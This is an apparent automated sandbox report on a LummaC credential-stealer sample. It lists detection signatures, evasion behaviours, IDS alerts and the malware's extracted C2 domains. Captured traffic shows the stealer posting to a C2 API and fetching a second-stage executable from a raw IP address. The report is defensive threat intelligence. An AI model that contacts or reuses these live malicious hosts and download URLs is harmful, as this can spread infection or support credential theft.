Edit tour

Windows Analysis Report
rwFNJ4pHWG.exe

Overview

General Information

Sample name:	rwFNJ4pHWG.exe renamed because original name is a hash value
Original sample name:	87e3d63f63a76cf5d2567f56880a719b.exe
Analysis ID:	1580870
MD5:	87e3d63f63a76cf5d2567f56880a719b
SHA1:	487be96de3684004bd047c3eb8a80ef7e3ea7e82
SHA256:	708a29fff997e6df811736dd1043cb76dc748cabd4cc4da7829315d5b66ede23
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Creates a process in suspended mode (likely to inject code)

Downloads executable code via HTTP

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

rwFNJ4pHWG.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\rwFNJ4pHWG.exe" MD5: 87E3D63F63A76CF5D2567F56880A719B)

chrome.exe (PID: 1496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 4236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1892,i,7369555305632958663,5508331813539714622,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 8004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 8108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1900,i,6860416848940867115,5479095251510896605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["appliacnesot.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "inherineau.buzz", "rebuildeso.buzz", "mindhandru.buzz", "screwamusresz.buzz", "scentniej.buzz", "prisonyfork.buzz"], "Build id": "VVok--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: rwFNJ4pHWG.exe PID: 7704	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: rwFNJ4pHWG.exe PID: 7704	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rwFNJ4pHWG.exe PID: 7704	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: rwFNJ4pHWG.exe PID: 7704	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:22.610014+0100	2028371	3	Unknown Traffic	192.168.2.7	49709	172.67.165.185	443	TCP
2024-12-26T12:41:24.845215+0100	2028371	3	Unknown Traffic	192.168.2.7	49715	172.67.165.185	443	TCP
2024-12-26T12:41:27.556216+0100	2028371	3	Unknown Traffic	192.168.2.7	49721	172.67.165.185	443	TCP
2024-12-26T12:41:30.036215+0100	2028371	3	Unknown Traffic	192.168.2.7	49726	172.67.165.185	443	TCP
2024-12-26T12:41:32.499966+0100	2028371	3	Unknown Traffic	192.168.2.7	49732	172.67.165.185	443	TCP
2024-12-26T12:41:35.207848+0100	2028371	3	Unknown Traffic	192.168.2.7	49742	172.67.165.185	443	TCP
2024-12-26T12:41:37.752831+0100	2028371	3	Unknown Traffic	192.168.2.7	49750	172.67.165.185	443	TCP
2024-12-26T12:41:42.821504+0100	2028371	3	Unknown Traffic	192.168.2.7	49762	172.67.165.185	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:23.374852+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49709	172.67.165.185	443	TCP
2024-12-26T12:41:25.615223+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49715	172.67.165.185	443	TCP
2024-12-26T12:41:43.614601+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49762	172.67.165.185	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:23.374852+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49709	172.67.165.185	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:25.615223+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49715	172.67.165.185	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:45.169485+0100	2019714	2	Potentially Bad Traffic	192.168.2.7	49768	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:28.612463+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49721	172.67.165.185	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rwFNJ4pHWG.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://mindhandru.buzz:443/api	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: rwFNJ4pHWG.exe.7704.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "inherineau.buzz", "rebuildeso.buzz", "mindhandru.buzz", "screwamusresz.buzz", "scentniej.buzz", "prisonyfork.buzz"], "Build id": "VVok--"}

Multi AV Scanner detection for submitted file

Source: rwFNJ4pHWG.exe	Virustotal: Detection: 50%			Perma Link
Source: rwFNJ4pHWG.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rwFNJ4pHWG.exe

Joe Sandbox ML: detected

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: rwFNJ4pHWG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49762 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: rwFNJ4pHWG.exe, 00000000.00000002.1736392714.00000000064D2000.00000040.00000800.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49715 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49721 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49709 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49709 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49762 -> 172.67.165.185:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 26 Dec 2024 11:41:44 GMTContent-Type: application/octet-streamContent-Length: 2801664Last-Modified: Thu, 26 Dec 2024 11:19:36 GMTConnection: keep-aliveETag: "676d3bc8-2ac000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 c5 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 74 77 78 76 6c 65 6c 00 40 2a 00 00 a0 00 00 00 32 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6e 6c 62 78 68 75 6e 00 20 00 00 00 e0 2a 00 00 04 00 00 00 9a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 9e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 172.67.165.185 172.67.165.185
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49732 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49750 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49742 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49726 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49762 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.165.185:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49768 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic

HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz

Source: rwFNJ4pHWG.exe, 00000000.00000003.1655093897.0000000001279000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1731552437.000000000123F000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1731552437.000000000123F000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeP
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeat
Source: rwFNJ4pHWG.exe, 00000000.00000002.1731395088.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeeWebKit/537.36
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1731552437.000000000123F000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exezen
